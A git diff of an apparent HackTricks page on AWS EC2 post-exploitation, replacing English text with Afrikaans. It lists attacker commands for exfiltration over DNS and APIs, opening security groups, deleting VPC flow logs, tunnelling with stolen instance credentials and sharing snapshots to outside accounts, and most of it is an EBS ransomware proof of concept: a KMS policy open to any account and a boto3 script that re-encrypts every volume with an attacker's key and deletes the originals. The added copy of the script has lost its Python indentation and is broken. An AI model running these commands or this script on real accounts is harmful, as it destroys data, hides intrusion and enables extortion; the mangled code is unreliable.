 ### EBS Snapshot dump
 
-**Snapshots are backups of volumes**, which usually will contain **sensitive information**, therefore checking them should disclose this information.\
-If you find a **volume without a snapshot** you could: **Create a snapshot** and perform the following actions or just **mount it in an instance** inside the account:
+**Snapshots is rugste van volumes**, wat gewoonlik **sensitiewe inligting** sal bevat, daarom behoort die nagaan daarvan hierdie inligting te openbaar.\
+As jy 'n **volume sonder 'n snapshot** vind, kan jy: **Skep 'n snapshot** en die volgende aksies uitvoer of net **mont dit in 'n instansie** binne die rekening:
 
 {{#ref}}
 aws-ebs-snapshot-dump.md
@@ -62,197 +60,178 @@ aws-ebs-snapshot-dump.md
 
 #### DNS Exfiltration
 
-Even if you lock down an EC2 so no traffic can get out, it can still **exfil via DNS**.
+Selfs as jy 'n EC2 sluit sodat geen verkeer kan uitgaan nie, kan dit steeds **exfil via DNS**.
 
-- **VPC Flow Logs will not record this**.
-- You have no access to AWS DNS logs.
-- Disable this by setting "enableDnsSupport" to false with:
+- **VPC Flow Logs sal dit nie opteken nie**.
+- Jy het geen toegang tot AWS DNS logs nie.
+- Deaktiveer dit deur "enableDnsSupport" op vals te stel met:
 
-  `aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id <vpc-id>`
+`aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id <vpc-id>`
 
 #### Exfiltration via API calls
 
-An attacker could call API endpoints of an account controlled by him. Cloudtrail will log this calls and the attacker will be able to see the exfiltrate data in the Cloudtrail logs.
+'n Aanvaller kan API eindpunte van 'n rekening wat deur hom beheer word, aanroep. Cloudtrail sal hierdie oproepe opteken en die aanvaller sal in staat wees om die exfiltreer data in die Cloudtrail logs te sien.
 
 ### Open Security Group
 
-You could get further access to network services by opening ports like this:
-
+Jy kan verdere toegang tot netwerkdienste verkry deur poorte soos volg te open:
 ```bash
 aws ec2 authorize-security-group-ingress --group-id <sg-id> --protocol tcp --port 80 --cidr 0.0.0.0/0
 # Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC
 ```
+### Privesc na ECS
 
-### Privesc to ECS
+Dit is moontlik om 'n EC2-instantie te draai en dit te registreer om gebruik te word om ECS-instanties te draai en dan die ECS-instanties se data te steel.
 
-It's possible to run an EC2 instance an register it to be used to run ECS instances and then steal the ECS instances data.
-
-For [**more information check this**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs).
-
-### Remove VPC flow logs
+Vir [**meer inligting, kyk hier**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs).
 
+### Verwyder VPC vloei logs
 ```bash
 aws ec2 delete-flow-logs --flow-log-ids <flow_log_ids> --region <region>
 ```
-
 ### SSM Port Forwarding
 
-Required permissions:
+Benodigde toestemmings:
 
 - `ssm:StartSession`
 
-In addition to command execution, SSM allows for traffic tunneling which can be abused to pivot from EC2 instances that do not have network access because of Security Groups or NACLs.
-One of the scenarios where this is useful is pivoting from a [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) to a private EKS cluster.
+Benewens opdraguitvoering, laat SSM vir verkeers-tunneling wat misbruik kan word om te pivot van EC2-instanties wat nie netwerktoegang het nie weens Veiligheidsgroepe of NACLs. Een van die scenario's waar dit nuttig is, is om te pivot van 'n [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) na 'n private EKS-kluster.
 
-> In order to start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html
-
-1. Install the SessionManagerPlugin on your machine
-2. Log in to the Bastion EC2 using the following command:
+> Om 'n sessie te begin, moet jy die SessionManagerPlugin geïnstalleer hê: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html
 
+1. Installeer die SessionManagerPlugin op jou masjien
+2. Meld aan by die Bastion EC2 met die volgende opdrag:
 ```shell
 aws ssm start-session --target "$INSTANCE_ID"
 ```
-
-3. Get the Bastion EC2 AWS temporary credentials with the [Abusing SSRF in AWS EC2 environment](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#abusing-ssrf-in-aws-ec2-environment) script
-4. Transfer the credentials to your own machine in the `$HOME/.aws/credentials` file as `[bastion-ec2]` profile
-5. Log in to EKS as the Bastion EC2:
-
+3. Kry die Bastion EC2 AWS tydelike geloofsbriewe met die [Abusing SSRF in AWS EC2 environment](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#abusing-ssrf-in-aws-ec2-environment) skrip  
+4. Oordra die geloofsbriewe na jou eie masjien in die `$HOME/.aws/credentials` lêer as `[bastion-ec2]` profiel  
+5. Meld aan by EKS as die Bastion EC2:
 ```shell
 aws eks update-kubeconfig --profile bastion-ec2 --region <EKS-CLUSTER-REGION> --name <EKS-CLUSTER-NAME>
 ```
-
-6. Update the `server` field in `$HOME/.kube/config` file to point to `https://localhost`
-7. Create an SSM tunnel as follows:
-
+6. Werk die `server` veld in die `$HOME/.kube/config` lêer op om na `https://localhost` te verwys  
+7. Skep 'n SSM-tonnel soos volg:
 ```shell
 sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortForwardingSessionToRemoteHost --parameters '{"host":["<TARGET-IP-OR-DOMAIN>"],"portNumber":["443"], "localPortNumber":["443"]}' --region <BASTION-INSTANCE-REGION>
 ```
-
-8. The traffic from the `kubectl` tool is now forwarded throug the SSM tunnel via the Bastion EC2 and you can access the private EKS cluster from your own machine by running:
-
+8. Die verkeer van die `kubectl` hulpmiddel word nou deur die SSM-tonnel via die Bastion EC2 gestuur en jy kan die private EKS-kluster vanaf jou eie masjien toegang verkry deur die volgende uit te voer:
 ```shell
 kubectl get pods --insecure-skip-tls-verify
 ```
+Let wel, die SSL-verbindinge sal misluk tensy jy die `--insecure-skip-tls-verify ` vlag (of sy ekwivalent in K8s-auditgereedskap) stel. Aangesien die verkeer deur die veilige AWS SSM-tonnel getunnel word, is jy veilig teen enige vorm van MitM-aanvalle.
 
-Note that the SSL connections will fail unless you set the `--insecure-skip-tls-verify ` flag (or its equivalent in K8s audit tools). Seeing that the traffic is tunnelled through the secure AWS SSM tunnel, you are safe from any sort of MitM attacks.
-
-Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application.
-
-### Share AMI
+Laastens, hierdie tegniek is nie spesifiek vir die aanval op private EKS-klusters nie. Jy kan arbitrêre domeine en poorte stel om na enige ander AWS-diens of 'n pasgemaakte toepassing te pivot.
 
+### Deel AMI
 ```bash
 aws ec2 modify-image-attribute --image-id <image_ID> --launch-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>
 ```
+### Soek sensitiewe inligting in openbare en private AMI's
 
-### Search sensitive information in public and private AMIs
-
-- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is a tool designed to **search for sensitive information within public or private Amazon Machine Images (AMIs)**. It automates the process of launching instances from target AMIs, mounting their volumes, and scanning for potential secrets or sensitive data.
-
-### Share EBS Snapshot
+- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is 'n hulpmiddel wat ontwerp is om **sensitiewe inligting binne openbare of private Amazon Machine Images (AMIs) te soek**. Dit outomatiseer die proses om instansies van teiken AMI's te begin, hul volumes te monteer, en te skandeer vir potensiële geheime of sensitiewe data.
 
+### Deel EBS Snapshot
 ```bash
 aws ec2 modify-snapshot-attribute --snapshot-id <snapshot_ID> --create-volume-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>
 ```
-
 ### EBS Ransomware PoC
 
-A proof of concept similar to the Ransomware demonstration demonstrated in the S3 post-exploitation notes. KMS should be renamed to RMS for Ransomware Management Service with how easy it is to use to encrypt various AWS services using it.
-
-First from an 'attacker' AWS account, create a customer managed key in KMS. For this example we'll just have AWS manage the key data for me, but in a realistic scenario a malicious actor would retain the key data outside of AWS' control. Change the key policy to allow for any AWS account Principal to use the key. For this key policy, the account's name was 'AttackSim' and the policy rule allowing all access is called 'Outside Encryption'
+'n Bewys van konsep soortgelyk aan die Ransomware demonstrasie wat in die S3 post-exploitation notas gedemonstreer is. KMS moet hernoem word na RMS vir Ransomware Bestuurdiens met hoe maklik dit is om verskeie AWS dienste te enkripteer met behulp daarvan.
 
+Eerstens, vanaf 'n 'aanvaller' AWS rekening, skep 'n kliënt bestuurde sleutel in KMS. Vir hierdie voorbeeld sal ons net hê dat AWS die sleuteldata vir my bestuur, maar in 'n realistiese scenario sou 'n kwaadwillige akteur die sleuteldata buite AWS se beheer hou. Verander die sleutelbeleid om enige AWS rekening Prinsipaal toe te laat om die sleutel te gebruik. Vir hierdie sleutelbeleid was die rekening se naam 'AttackSim' en die beleidsreël wat alle toegang toelaat, word 'Buite Enkripsie' genoem.
 ```
 {
-    "Version": "2012-10-17",
-    "Id": "key-consolepolicy-3",
-    "Statement": [
-        {
-            "Sid": "Enable IAM User Permissions",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "arn:aws:iam::[Your AWS Account Id]:root"
-            },
-            "Action": "kms:*",
-            "Resource": "*"
-        },
-        {
-            "Sid": "Allow access for Key Administrators",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
-            },
-            "Action": [
-                "kms:Create*",
-                "kms:Describe*",
-                "kms:Enable*",
-                "kms:List*",
-                "kms:Put*",
-                "kms:Update*",
-                "kms:Revoke*",
-                "kms:Disable*",
-                "kms:Get*",
-                "kms:Delete*",
-                "kms:TagResource",
-                "kms:UntagResource",
-                "kms:ScheduleKeyDeletion",
-                "kms:CancelKeyDeletion"
-            ],
-            "Resource": "*"
-        },
-        {
-            "Sid": "Allow use of the key",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
-            },
-            "Action": [
-                "kms:Encrypt",
-                "kms:Decrypt",
-                "kms:ReEncrypt*",
-                "kms:GenerateDataKey*",
-                "kms:DescribeKey"
-            ],
-            "Resource": "*"
-        },
-        {
-            "Sid": "Outside Encryption",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "*"
-            },
-            "Action": [
-                "kms:Encrypt",
-                "kms:Decrypt",
-                "kms:ReEncrypt*",
-                "kms:GenerateDataKey*",
-                "kms:DescribeKey",
-                "kms:GenerateDataKeyWithoutPlainText",
-                "kms:CreateGrant"
-            ],
-            "Resource": "*"
-        },
-        {
-            "Sid": "Allow attachment of persistent resources",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
-            },
-            "Action": [
-                "kms:CreateGrant",
-                "kms:ListGrants",
-                "kms:RevokeGrant"
-            ],
-            "Resource": "*",
-            "Condition": {
-                "Bool": {
-                    "kms:GrantIsForAWSResource": "true"
-                }
-            }
-        }
-    ]
+"Version": "2012-10-17",
+"Id": "key-consolepolicy-3",
+"Statement": [
+{
+"Sid": "Enable IAM User Permissions",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
+},
+"Action": "kms:*",
+"Resource": "*"
+},
+{
+"Sid": "Allow access for Key Administrators",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+},
+"Action": [
+"kms:Create*",
+"kms:Describe*",
+"kms:Enable*",
+"kms:List*",
+"kms:Put*",
+"kms:Update*",
+"kms:Revoke*",
+"kms:Disable*",
+"kms:Get*",
+"kms:Delete*",
+"kms:TagResource",
+"kms:UntagResource",
+"kms:ScheduleKeyDeletion",
+"kms:CancelKeyDeletion"
+],
+"Resource": "*"
+},
+{
+"Sid": "Allow use of the key",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+},
+"Action": [
+"kms:Encrypt",
+"kms:Decrypt",
+"kms:ReEncrypt*",
+"kms:GenerateDataKey*",
+"kms:DescribeKey"
+],
+"Resource": "*"
+},
+{
+"Sid": "Outside Encryption",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": [
+"kms:Encrypt",
+"kms:Decrypt",
+"kms:ReEncrypt*",
+"kms:GenerateDataKey*",
+"kms:DescribeKey",
+"kms:GenerateDataKeyWithoutPlainText",
+"kms:CreateGrant"
+],
+"Resource": "*"
+},
+{
+"Sid": "Allow attachment of persistent resources",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+},
+"Action": [
+"kms:CreateGrant",
+"kms:ListGrants",
+"kms:RevokeGrant"
+],
+"Resource": "*",
+"Condition": {
+"Bool": {
+"kms:GrantIsForAWSResource": "true"
+}
+}
+}
+]
 }
 ```
-
-The key policy rule needs the following enabled to allow for the ability to use it to encrypt an EBS volume:
+Die sleutelbeleidreël benodig die volgende geaktiveer om die vermoë te hê om dit te gebruik om 'n EBS-volume te enkripteer:
 
 - `kms:CreateGrant`
 - `kms:Decrypt`
@@ -260,222 +239,214 @@ The key policy rule needs the following enabled to allow for the ability to use
 - `kms:GenerateDataKeyWithoutPlainText`
 - `kms:ReEncrypt`
 
-Now with the publicly accessible key to use. We can use a 'victim' account that has some EC2 instances spun up with unencrypted EBS volumes attached. This 'victim' account's EBS volumes are what we're targeting for encryption, this attack is under the assumed breach of a high-privilege AWS account.
+Nou met die publiek toeganklike sleutel om te gebruik. Ons kan 'n 'slagoffer' rekening gebruik wat 'n paar EC2-instanse het met ongeënkripteerde EBS-volumes aangeheg. Hierdie 'slagoffer' rekening se EBS-volumes is wat ons teiken vir enkripsie, hierdie aanval is onder die veronderstelde oortreding van 'n hoë-bevoegdheid AWS-rekening.
 
 ![Pasted image 20231231172655](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/5b9a96cd-6006-4965-84a4-b090456f90c6) ![Pasted image 20231231172734](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4294289c-0dbd-4eb6-a484-60b4e4266459)
 
-Similar to the S3 ransomware example. This attack will create copies of the attached EBS volumes using snapshots, use the publicly available key from the 'attacker' account to encrypt the new EBS volumes, then detach the original EBS volumes from the EC2 instances and delete them, and then finally delete the snapshots used to create the newly encrypted EBS volumes. ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e)
+Soos in die S3 ransomware voorbeeld. Hierdie aanval sal kopieë van die aangehegte EBS-volumes skep met behulp van snapshots, die publiek beskikbare sleutel van die 'aanvaller' rekening gebruik om die nuwe EBS-volumes te enkripteer, dan die oorspronklike EBS-volumes van die EC2-instanse af te ontkoppel en dit te verwyder, en dan uiteindelik die snapshots wat gebruik is om die nuut enkripteerde EBS-volumes te skep, te verwyder. ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e)
 
-This results in only encrypted EBS volumes left available in the account.
+Dit lei tot slegs enkripteerde EBS-volumes wat beskikbaar is in die rekening.
 
 ![Pasted image 20231231173338](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/eccdda58-f4b1-44ea-9719-43afef9a8220)
 
-Also worth noting, the script stopped the EC2 instances to detach and delete the original EBS volumes. The original unencrypted volumes are gone now.
+Dit is ook die moeite werd om te noem, die skrip het die EC2-instanse gestop om die oorspronklike EBS-volumes te ontkoppel en te verwyder. Die oorspronklike ongeënkripteerde volumes is nou weg.
 
 ![Pasted image 20231231173931](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/cc31a5c9-fbb4-4804-ac87-911191bb230e)
 
-Next, return to the key policy in the 'attacker' account and remove the 'Outside Encryption' policy rule from the key policy.
-
+Volgende, keer terug na die sleutelbeleid in die 'aanvaller' rekening en verwyder die 'Buitelandse Enkripsie' beleidreël uit die sleutelbeleid.
 ```json
 {
-  "Version": "2012-10-17",
-  "Id": "key-consolepolicy-3",
-  "Statement": [
-    {
-      "Sid": "Enable IAM User Permissions",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::[Your AWS Account Id]:root"
-      },
-      "Action": "kms:*",
-      "Resource": "*"
-    },
-    {
-      "Sid": "Allow access for Key Administrators",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
-      },
-      "Action": [
-        "kms:Create*",
-        "kms:Describe*",
-        "kms:Enable*",
-        "kms:List*",
-        "kms:Put*",
-        "kms:Update*",
-        "kms:Revoke*",
-        "kms:Disable*",
-        "kms:Get*",
-        "kms:Delete*",
-        "kms:TagResource",
-        "kms:UntagResource",
-        "kms:ScheduleKeyDeletion",
-        "kms:CancelKeyDeletion"
-      ],
-      "Resource": "*"
-    },
-    {
-      "Sid": "Allow use of the key",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
-      },
-      "Action": [
-        "kms:Encrypt",
-        "kms:Decrypt",
-        "kms:ReEncrypt*",
-        "kms:GenerateDataKey*",
-        "kms:DescribeKey"
-      ],
-      "Resource": "*"
-    },
-    {
-      "Sid": "Allow attachment of persistent resources",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
-      },
-      "Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"],
-      "Resource": "*",
-      "Condition": {
-        "Bool": {
-          "kms:GrantIsForAWSResource": "true"
-        }
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Id": "key-consolepolicy-3",
+"Statement": [
+{
+"Sid": "Enable IAM User Permissions",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
+},
+"Action": "kms:*",
+"Resource": "*"
+},
+{
+"Sid": "Allow access for Key Administrators",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+},
+"Action": [
+"kms:Create*",
+"kms:Describe*",
+"kms:Enable*",
+"kms:List*",
+"kms:Put*",
+"kms:Update*",
+"kms:Revoke*",
+"kms:Disable*",
+"kms:Get*",
+"kms:Delete*",
+"kms:TagResource",
+"kms:UntagResource",
+"kms:ScheduleKeyDeletion",
+"kms:CancelKeyDeletion"
+],
+"Resource": "*"
+},
+{
+"Sid": "Allow use of the key",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+},
+"Action": [
+"kms:Encrypt",
+"kms:Decrypt",
+"kms:ReEncrypt*",
+"kms:GenerateDataKey*",
+"kms:DescribeKey"
+],
+"Resource": "*"
+},
+{
+"Sid": "Allow attachment of persistent resources",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+},
+"Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"],
+"Resource": "*",
+"Condition": {
+"Bool": {
+"kms:GrantIsForAWSResource": "true"
+}
+}
+}
+]
 }
 ```
-
-Wait a moment for the newly set key policy to propagate. Then return to the 'victim' account and attempt to attach one of the newly encrypted EBS volumes. You'll find that you can attach the volume.
+Wag 'n oomblik vir die nuut ingestelde sleutelbeleid om te versprei. Keer dan terug na die 'slagoffer' rekening en probeer om een van die nuut versleutelde EBS volumes aan te sluit. Jy sal vind dat jy die volume kan aanheg.
 
 ![Pasted image 20231231174131](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/ba9e5340-7020-4af9-95cc-0e02267ced47) ![Pasted image 20231231174258](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/6c3215ec-4161-44e2-b1c1-e32f43ad0fa4)
 
-But when you attempt to actually start the EC2 instance back up with the encrypted EBS volume it'll just fail and go from the 'pending' state back to the 'stopped' state forever since the attached EBS volume can't be decrypted using the key since the key policy no longer allows it.
+Maar wanneer jy probeer om die EC2 instansie weer op te start met die versleutelde EBS volume, sal dit net misluk en van die 'pending' toestand teruggaan na die 'stopped' toestand vir altyd, aangesien die aangehegte EBS volume nie ontsleutel kan word met die sleutel nie, omdat die sleutelbeleid dit nie meer toelaat nie.
 
 ![Pasted image 20231231174322](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/73456c22-0828-4da9-a737-e4d90fa3f514) ![Pasted image 20231231174352](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4d83a90e-6fa9-4003-b904-a4ba7f5944d0)
 
-This the python script used. It takes AWS creds for a 'victim' account and a publicly available AWS ARN value for the key to be used for encryption. The script will make encrypted copies of ALL available EBS volumes attached to ALL EC2 instances in the targeted AWS account, then stop every EC2 instance, detach the original EBS volumes, delete them, and finally delete all the snapshots utilized during the process. This will leave only encrypted EBS volumes in the targeted 'victim' account. ONLY USE THIS SCRIPT IN A TEST ENVIRONMENT, IT IS DESTRUCTIVE AND WILL DELETE ALL THE ORIGINAL EBS VOLUMES. You can recover them using the utilized KMS key and restore them to their original state via snapshots, but just want to make you aware that this is a ransomware PoC at the end of the day.
-
+Dit is die python skrip wat gebruik word. Dit neem AWS krediete vir 'n 'slagoffer' rekening en 'n publiek beskikbare AWS ARN waarde vir die sleutel wat gebruik gaan word vir versleuteling. Die skrip sal versleutelde kopieë van ALLE beskikbare EBS volumes wat aan ALLE EC2 instansies in die geteikende AWS rekening geheg is, maak, dan elke EC2 instansie stop, die oorspronklike EBS volumes ontkoppel, hulle verwyder, en uiteindelik al die snappings wat tydens die proses gebruik is, verwyder. Dit sal slegs versleutelde EBS volumes in die geteikende 'slagoffer' rekening agterlaat. GEBRUIK DIT SLEGS IN 'N TOETSOMGEWING, DIT IS DESTRUKTIEF EN SAL AL DIE ORIGINELE EBS VOLUMES VERWYDER. Jy kan hulle herstel met die gebruikte KMS sleutel en hulle na hul oorspronklike toestand herstel via snappings, maar ek wil jou net bewus maak dat dit 'n ransomware PoC aan die einde van die dag is.
 ```
 import boto3
 import argparse
 from botocore.exceptions import ClientError
 
 def enumerate_ec2_instances(ec2_client):
-    instances = ec2_client.describe_instances()
-    instance_volumes = {}
-    for reservation in instances['Reservations']:
-        for instance in reservation['Instances']:
-            instance_id = instance['InstanceId']
-            volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol]
-            instance_volumes[instance_id] = volumes
-    return instance_volumes
+instances = ec2_client.describe_instances()
+instance_volumes = {}
+for reservation in instances['Reservations']:
+for instance in reservation['Instances']:
+instance_id = instance['InstanceId']
+volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol]
+instance_volumes[instance_id] = volumes
+return instance_volumes
 
 def snapshot_volumes(ec2_client, volumes):
-    snapshot_ids = []
-    for volume_id in volumes:
-        snapshot = ec2_client.create_snapshot(VolumeId=volume_id)
-        snapshot_ids.append(snapshot['SnapshotId'])
-    return snapshot_ids
+snapshot_ids = []
+for volume_id in volumes:
+snapshot = ec2_client.create_snapshot(VolumeId=volume_id)
+snapshot_ids.append(snapshot['SnapshotId'])
+return snapshot_ids
 
 def wait_for_snapshots(ec2_client, snapshot_ids):
-    for snapshot_id in snapshot_ids:
-        ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id])
+for snapshot_id in snapshot_ids:
+ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id])
 
 def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn):
-    new_volume_ids = []
-    for snapshot_id in snapshot_ids:
-        snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0]
-        volume_id = snapshot_info['VolumeId']
-        volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0]
-        availability_zone = volume_info['AvailabilityZone']
+new_volume_ids = []
+for snapshot_id in snapshot_ids:
+snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0]
+volume_id = snapshot_info['VolumeId']
+volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0]
+availability_zone = volume_info['AvailabilityZone']
 
-        volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone,
-                                          Encrypted=True, KmsKeyId=kms_key_arn)
-        new_volume_ids.append(volume['VolumeId'])
-    return new_volume_ids
+volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone,
+Encrypted=True, KmsKeyId=kms_key_arn)
+new_volume_ids.append(volume['VolumeId'])
+return new_volume_ids
 
 def stop_instances(ec2_client, instance_ids):
-    for instance_id in instance_ids:
-        try:
-            instance_description = ec2_client.describe_instances(InstanceIds=[instance_id])
-            instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name']
+for instance_id in instance_ids:
+try:
+instance_description = ec2_client.describe_instances(InstanceIds=[instance_id])
+instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name']
 
-            if instance_state == 'running':
-                ec2_client.stop_instances(InstanceIds=[instance_id])
-                print(f"Stopping instance: {instance_id}")
-                ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id])
-                print(f"Instance {instance_id} stopped.")
-            else:
-                print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).")
+if instance_state == 'running':
+ec2_client.stop_instances(InstanceIds=[instance_id])
+print(f"Stopping instance: {instance_id}")
+ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id])
+print(f"Instance {instance_id} stopped.")
+else:
+print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).")
 
-        except ClientError as e:
-            print(f"Error stopping instance {instance_id}: {e}")
+except ClientError as e:
+print(f"Error stopping instance {instance_id}: {e}")
 
 def detach_and_delete_volumes(ec2_client, volumes):
-    for volume_id in volumes:
-        try:
-            ec2_client.detach_volume(VolumeId=volume_id)
-            ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id])
-            ec2_client.delete_volume(VolumeId=volume_id)
-            print(f"Deleted volume: {volume_id}")
-        except ClientError as e:
-            print(f"Error detaching or deleting volume {volume_id}: {e}")
+for volume_id in volumes:
+try:
+ec2_client.detach_volume(VolumeId=volume_id)
+ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id])
+ec2_client.delete_volume(VolumeId=volume_id)
+print(f"Deleted volume: {volume_id}")
+except ClientError as e:
+print(f"Error detaching or deleting volume {volume_id}: {e}")
 
 
 def delete_snapshots(ec2_client, snapshot_ids):
-    for snapshot_id in snapshot_ids:
-        try:
-            ec2_client.delete_snapshot(SnapshotId=snapshot_id)
-            print(f"Deleted snapshot: {snapshot_id}")
-        except ClientError as e:
-            print(f"Error deleting snapshot {snapshot_id}: {e}")
+for snapshot_id in snapshot_ids:
+try:
+ec2_client.delete_snapshot(SnapshotId=snapshot_id)
+print(f"Deleted snapshot: {snapshot_id}")
+except ClientError as e:
+print(f"Error deleting snapshot {snapshot_id}: {e}")
 
 def replace_volumes(ec2_client, instance_volumes):
-    instance_ids = list(instance_volumes.keys())
-    stop_instances(ec2_client, instance_ids)
+instance_ids = list(instance_volumes.keys())
+stop_instances(ec2_client, instance_ids)
 
-    all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
-    detach_and_delete_volumes(ec2_client, all_volumes)
+all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
+detach_and_delete_volumes(ec2_client, all_volumes)
 
 def ebs_lock(access_key, secret_key, region, kms_key_arn):
-    ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region)
+ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region)
 
-    instance_volumes = enumerate_ec2_instances(ec2_client)
-    all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
-    snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
-    wait_for_snapshots(ec2_client, snapshot_ids)
-    create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn)  # New encrypted volumes are created but not attached
-    replace_volumes(ec2_client, instance_volumes)  # Stops instances, detaches and deletes old volumes
-    delete_snapshots(ec2_client, snapshot_ids)  # Optionally delete snapshots if no longer needed
+instance_volumes = enumerate_ec2_instances(ec2_client)
+all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
+snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
+wait_for_snapshots(ec2_client, snapshot_ids)
+create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn)  # New encrypted volumes are created but not attached
+replace_volumes(ec2_client, instance_volumes)  # Stops instances, detaches and deletes old volumes
+delete_snapshots(ec2_client, snapshot_ids)  # Optionally delete snapshots if no longer needed
 
 def parse_arguments():
-    parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool')
-    parser.add_argument('--access-key', required=True, help='AWS Access Key ID')
-    parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key')
-    parser.add_argument('--region', required=True, help='AWS Region')
-    parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption')
-    return parser.parse_args()
+parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool')
+parser.add_argument('--access-key', required=True, help='AWS Access Key ID')
+parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key')
+parser.add_argument('--region', required=True, help='AWS Region')
+parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption')
+return parser.parse_args()
 
 def main():
-    args = parse_arguments()
-    ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region)
+args = parse_arguments()
